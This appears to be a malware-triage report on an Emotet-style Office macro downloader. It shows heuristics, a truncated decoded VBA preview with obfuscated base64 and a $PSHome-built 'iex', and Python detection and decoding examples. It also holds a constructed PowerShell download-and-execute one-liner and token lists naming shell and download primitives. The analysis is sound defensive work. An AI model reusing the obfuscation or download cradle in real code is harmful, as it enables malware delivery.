Verdict: MALICIOUS (Risk Score 224)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. Static heuristics flag a CreateObject call and, in the compiled p-code stream, an auto-execution token alongside shell/download/object-execution tokens; together these point to a downloader that fetches and runs a second-stage payload. The decoded source (see the preview below) is padded with dead Select Case blocks that compare uninitialised variables against random constants, and its live statements pass junk-wrapped string fragments to a helper named jVtfX that reassembles them. The fragments include base64 of UTF-16LE text (the recurring "A" high bytes are the giveaway) and an obfuscated PowerShell fragment, `$PSHomE[4]+$PsHomE[34]+'x'`, which resolves to `iex` on a stock Windows install; both are consistent with a PowerShell-based downloader. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' (an Emotet document downloader signature) corroborates the verdict.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro; the procedure runs without any user action beyond enabling macros.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: the rule's premise (no modern VBA project recovered) does not hold here, since a VBA project was extracted and AutoOpen is visible in its source, so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that Office writes into any document containing drawing content; it is not a network indicator and must not be treated as a download or C2 URL.
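To make the OLE_VBA_PCODE_AUTOEXEC_EXEC logic concrete, here is an added example (not the analyzer's own code) of the token scan that rule describes. It runs over raw bytes, so the same function works on a compiled p-code or cache stream and on decoded source (pass `src.encode()`), and it matches each token stored either as ASCII or as UTF-16LE, both of which occur in VBA project streams. The token lists and the two sample byte strings are constructed for the example.

```python
import re

# Auto-execution entry points (Word and Excel trigger names).
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "AutoExit", "AutoNew",
                   "Document_Open", "Document_Close", "Workbook_Open", "Auto_Open")
# Shell / download / object-execution tokens that turn a trigger into a loader indicator.
EXEC_TOKENS = ("CreateObject", "Shell", "WScript.Shell", "powershell", "cmd.exe",
               "DownloadFile", "DownloadString", "XMLHTTP", "ADODB.Stream",
               "URLDownloadToFile")


def _present(tokens, data: bytes) -> list:
    """Return the tokens found in `data`, as ASCII or UTF-16LE, case-insensitively."""
    low = data.lower()                  # bytes.lower() only touches ASCII letters, so the
    found = []                          # 0x00 high bytes of UTF-16LE text survive intact
    for tok in tokens:
        t = tok.lower()
        if t.encode("ascii") in low or t.encode("utf-16-le") in low:
            found.append(tok)
    return sorted(found)


def scan_stream(data: bytes) -> dict:
    """Classify the auto-exec and execution tokens present in a VBA stream or source."""
    return {"autoexec": _present(AUTOEXEC_TOKENS, data),
            "exec": _present(EXEC_TOKENS, data)}


def pcode_autoexec_exec(data: bytes) -> bool:
    """The rule's verdict: a trigger AND at least one execution token in the same stream."""
    r = scan_stream(data)
    return bool(r["autoexec"]) and bool(r["exec"])


# Constructed stand-ins for stream contents (not bytes from the sample): p-code and the
# cache streams interleave opcodes with identifier text, so identifiers show up as bare
# ASCII or UTF-16LE runs between binary bytes.
PCODE_LIKE = (b"\x01\x00\x12\x00" + b"AutoOpen" + b"\x00\x02\x7f"
              + "CreateObject".encode("utf-16-le") + b"\x00\x00"
              + b"WScript.Shell" + b"\xff\xfe")
BENIGN_LIKE = b"\x00\x10" + b"Document_Open" + b"\x00" + "MsgBox".encode("utf-16-le")

if __name__ == "__main__":
    for name, blob in (("pcode-like", PCODE_LIKE), ("benign-like", BENIGN_LIKE)):
        print(name, scan_stream(blob), "-> fires" if pcode_autoexec_exec(blob) else "-> no")
```

The conjunction is the point: an auto-exec trigger alone is common in benign templates and CreateObject alone is common in benign automation, so neither is flagged on its own. Short tokens such as Shell will also match inside longer identifiers (WScript.Shell above), which is acceptable for a triage signal but is why the rule is not a verdict by itself.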
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44922 bytes |

SHA-256: 998f8e8bc5acfc69747ef0b6799b08c9a0b7f298c9db56a759e8050aceb4326b
Detection: ClamAV: No threats found (the ClamAV hit listed under Heuristics is on the parent document, not on the carved source)
Obfuscation or payload: likely. Carved artifact contains 24 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script, as decoded by olevba. The two Attribute VB_Name lines show two modules concatenated: the ThisDocument class module zuZropGiurGp (VB_Base = "1Normal.ThisDocument") and the standard module zDViGBuXwjXGA that holds the obfuscated code.
Attribute VB_Name = "zuZropGiurGp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zDViGBuXwjXGA"
Function NhTORXaBT()
On Error Resume Next
Select Case IBZYv
Case 44254
ktccu = Hex(96894 - CSng(10369) - 98884 + ChrW(mnNzV))
pXAiGV = FZFJKr
End Select
sNqju = jVtfX("XAPi5fANQBkADQAOAAyADMANwAyADIAMAAxADIAZgA1ADQAMQBkADYAZQBmADkAMwAyAGIAMgAxADIANgAxADgANQA1AGYAZQBhADYAMAAwAGUAZQA3AGYAZgAwADgAZQAyAGQAMgBkADgAMgAzADAAMQAyADgAYwA2ADQAZgAzAGMAZQBhAGQAcpk", 7, 177)
Select Case JUVnF
Case 98699
rpWXk = Hex(77257 - CSng(11996) - 17852 + ChrW(kijXL))
XRQkG = CXknOi
End Select
Select Case iQJrEP
Case 61051
cbcUc = Hex(15939 - CSng(18700) - 69924 + ChrW(ECAmtc))
mIrKw = mwTTXJ
End Select
szGpmT = jVtfX("z qd52E (165..134)) ) ))|& ( $PSHomE[4]+$PsHomE[34]+'x')dz", 7, 51)
Select Case mEAMA
Case 45641
hlwCld = Hex(58591 - CSng(75703) - 73498 + ChrW(HkokF))
XUZspj = JkARt
End Select
Select Case cWvwWs
Case 39206
zrVEiY = Hex(94771 - CSng(23828) - 33760 + ChrW(XvCnS))
GwSfw = FXYsjU
End Select
dSooj = jVtfX("%2uhokAOAA5ADEANABkADkAZQAyAGIAZAA4AGEANQAwADgAMQBhADAAMAAzADIAYgBiAGIAYQAzAGYAMgA18Q", 6, 78)
Select Case ApzzLR
Case 54792
jdvNN = Hex(71422 - CSng(68305) - 2148 + ChrW(npElp))
apiRlz = mpcjRS
End Select
Select Case NtHTk
Case 58287
aihKLY = Hex(70251 - CSng(25789) - 24409 + ChrW(YhwPb))
foqssJ = YXTKfN
End Select
zGOCYiB = jVtfX("3ZAA5AGYAMABkAGIAYwA1AGMAMwBhADEAMgA2AGUAOAAzADYAZAA3ADIAMwBiADQAYQBmAGMAZAA1ADkANAAzADcAMwAyAGYAMABhAGQAYwA0ADQAYwA3AGUAZAA%5C7h", 2, 123)
Select Case jFksYY
Case 74258
DIWPt = Hex(44574 - CSng(47452) - 54025 + ChrW(mmvcft))
mQzJms = FAQpS
End Select
Select Case hSnHG
Case 8415
fwwjiM = Hex(10529 - CSng(5023) - 55511 + ChrW(ZLwLR))
aqMCA = bHRAbw
End Select
TYtjD = jVtfX("dP4wCCjgA5ADUAYQAzADcAMwBkADkAZAAwADAAZABhADgANQBmADAANAA0AGUANQA5AGUAYwAyAGUAOQBmAGYAMAA0ADkANQVK", 8, 89)
Select Case zRfAf
Case 17996
vkiQEi = Hex(56887 - CSng(78130) - 49292 + ChrW(AwQBM))
uBjoU = OikJmf
End Select
Select Case DiOrnw
Case 79971
cvBYaR = Hex(35926 - CSng(6623) - 67206 + ChrW(BTNzO))
FhwfM = FmQUZq
End Select
zNwMY = jVtfX("qD3DgAMABmADcAOAA1ADEAMgBjAGEANwAxAGQANgA5ADYANABhADkAOABiAGYANAA0ADIAOQAyAGQAZQBkAGYANQAwAGIANwAwADkAYwAyADAANgBhADEAYwA2ADQAYwAxADkAMwA3ADcAZQBkADgAOAAxADMAMQBlADkAYgAyADEUAWs", 4, 170)
Select Case LVNboA
Case 41705
fqlML = Hex(36407 - CSng(61428) - 62078 + ChrW(XDUNmG))
KfzqOI = rcXXB
End Select
Select Case iZiRPw
Case 69315
YihvsU = Hex(52706 - CSng(68383) - 19978 + ChrW(FKISI))
UUvUM = KVnmt
End Select
VpAhlziIdu = jVtfX("7jQ1n4gANwBkADYAOQAxADUAOABlADAAOQA1AGMANQBkADQAMQA4ADcAYwBkADIAYwA4AGQAZgAFk", 7, 69)
Select Case ldziS
Case 61348
EfVDsq = Hex(25961 - CSng(12316) - 61717 + ChrW(BrMRNz))
BPOTTM = FbZwh
End Select
Select Case sVuiZi
Case 35419
Gwwrn = Hex(43994 - CSng(53737) - 77587 + ChrW(AHUDr))
LLJNXf = YlsdBT
End Select
CciuVlMb = jVtfX("0FAQADEAMAAwADYANQBjAGQANAAyAGYAYwBjAGYAYgA4ADcAW3A", 5, 44)
Select Case SoSWHp
Case 41075
ujOlv = Hex(1428 - CSng(29543) - 58144 + ChrW(dBZiW))
RuXLX = wJVIH
End Select
Select Case BwGrj
Case 68640
vOjEj = Hex(28435 - CSng(47499) - 27586 + ChrW(lOApVc))
LjjKz = QHmrpT
End Select
LSohwhso = jVtfX("w5wH0AGMAMgBkADAAYgA3AGUAYwA5ADQANQA5ADIANwBiADAAZgBmAGEANgA5ADgAMQAwAGUAMQA1ADkANABhADgANAA
... (truncated)
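The preview shows two reusable patterns worth decoding in triage: junk-wrapped string fragments handed to jVtfX(s, a, b), and a PowerShell `iex` spelled from $PSHome characters. The following is an added example (not code from the sample or from the analyzer) that models both. Assumptions, labelled as such in the code: jVtfX is treated as VBA's Mid (1-based start, length), because the page does not show its body and its arguments do not line up exactly with a plain Mid; $PSHome is taken as the stock Windows PowerShell 5.1 path; the PowerShell one-liner, the example.invalid URL and the VBA snippet are constructed inputs shaped like the preview, not the sample's own strings.

```python
import base64
import binascii
import re

# $PSHome on a stock 64-bit Windows install (assumed). Index 4 is 'i' and index 34 is 'e'
# both here and under SysWOW64, which is why the sample's indices work on either path.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

PSHOME_PIECE = r"\$pshome\[(\d+)\]|'([^']*)'"
PSHOME_EXPR_RE = re.compile(
    r"\$pshome\[\d+\](?:\s*\+\s*(?:\$pshome\[\d+\]|'[^']*'))*", re.I)
JVTFX_CALL_RE = re.compile(r'jVtfX\("([^"]*)",\s*(\d+),\s*(\d+)\)')
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def resolve_pshome_expr(expr: str) -> str:
    """Evaluate "$PSHome[n] + ... + 'lit'" the way PowerShell would, using PSHOME."""
    out = []
    for m in re.finditer(PSHOME_PIECE, expr, re.I):
        out.append(PSHOME[int(m.group(1))] if m.group(1) is not None else m.group(2))
    return "".join(out)


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, at most `length` chars (assumed jVtfX semantics)."""
    return s[start - 1:start - 1 + length]


def decode_utf16_b64(fragment: str):
    """Return the text if `fragment` holds base64 of UTF-16LE text, else None.
    The 'A' every few characters in the preview's blobs is the 0x00 high byte of
    UTF-16LE ASCII; this checks that property on the decoded bytes instead of by eye."""
    m = B64_RUN_RE.search(fragment)
    if not m:
        return None
    blob = m.group(0)
    blob += "=" * (-len(blob) % 4)          # junk suffixes often swallow the padding
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) < 8 or len(raw) % 2:
        return None
    high = raw[1::2]
    if high.count(0) / len(high) < 0.9:     # small slack for the odd non-ASCII char
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_source(src: str) -> list:
    """Walk every jVtfX(...) call, apply the assumed Mid slice, and label what is left."""
    results = []
    for s, start, length in JVTFX_CALL_RE.findall(src):
        piece = vba_mid(s, int(start), int(length))
        if PSHOME_EXPR_RE.search(piece):
            value = PSHOME_EXPR_RE.sub(lambda m: resolve_pshome_expr(m.group(0)), piece)
            results.append({"kind": "pshome", "value": value})
            continue
        text = decode_utf16_b64(piece)
        if text is not None:
            results.append({"kind": "utf16le-b64", "value": text})
        else:
            results.append({"kind": "opaque", "value": piece})
    return results


# Constructed input (not the sample's real strings): a PowerShell one-liner encoded the
# way the preview's blobs are, wrapped in 6 junk characters on the left and 3 on the right.
PAYLOAD_PS = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
B64 = base64.b64encode(PAYLOAD_PS.encode("utf-16-le")).decode()
SAMPLE_SRC = f'''
Function NhTORXaBT()
    On Error Resume Next
    szGpmT = jVtfX("z qd52E (165..134)) ) ))|& ( $PSHomE[4]+$PsHomE[34]+'x')dz", 7, 51)
    dSooj = jVtfX("%2uhok{B64}18Q", 7, {len(B64)})
End Function
'''

if __name__ == "__main__":
    for r in triage_source(SAMPLE_SRC):
        print(r["kind"], "->", r["value"])
```

The UTF-16LE check is what separates a PowerShell -EncodedCommand style blob from ordinary base64: decode first, then require that nearly every odd byte is zero before interpreting it as text. Against the real macro, the first step that matters is recovering jVtfX's actual slicing rule from its body, since the page only shows the call sites.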